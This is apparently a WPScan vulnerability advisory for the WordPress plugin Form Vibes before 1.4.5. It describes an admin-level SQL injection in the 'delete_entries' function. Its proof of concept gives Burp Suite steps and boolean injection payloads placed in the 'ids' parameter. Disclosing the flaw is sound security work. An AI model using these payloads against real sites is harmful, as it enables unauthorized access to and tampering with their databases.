Lucene search

K
wpvulndbNguyen Duy Quoc KhanhWPVDB-ID:9D49DF6B-E2F1-4662-90D2-84C29C3B1CB0
HistoryNov 08, 2022 - 12:00 a.m.

Form Vibes < 1.4.5 - Admin+ SQLi

2022-11-0800:00:00
Nguyen Duy Quoc Khanh
wpscan.com
6
form vibes
sql injection
admin+
burp suite
contact form 7

0.001 Low

EPSS

Percentile

19.5%

The “delete_entries” function does not filter parameters from the request. This leads to an SQL Injection vulnerability.

PoC

- Create a submission using the Contact From 7 plugin. - On the Form Vibes tab in the dashboard, click “submissions” and implement the delete function on an entry. - Intercept the request and send it to repeater in Burp suite. - Change the parameter “params” to: {“ids”:[“9) AND (1=2);-- -”]} - Send the request, we get this response: {“status”:“failed”,“message”:“Could not able to delete Entries”} - Change the parameter “params” to: {“ids”:[“9) AND (1=1);-- -”]} - Send the request, the response this time is the following: {“status”:“passed”,“message”:“Entries Deleted”}

CPENameOperatorVersion
form-vibeslt1.4.6

0.001 Low

EPSS

Percentile

19.5%

Related for WPVDB-ID:9D49DF6B-E2F1-4662-90D2-84C29C3B1CB0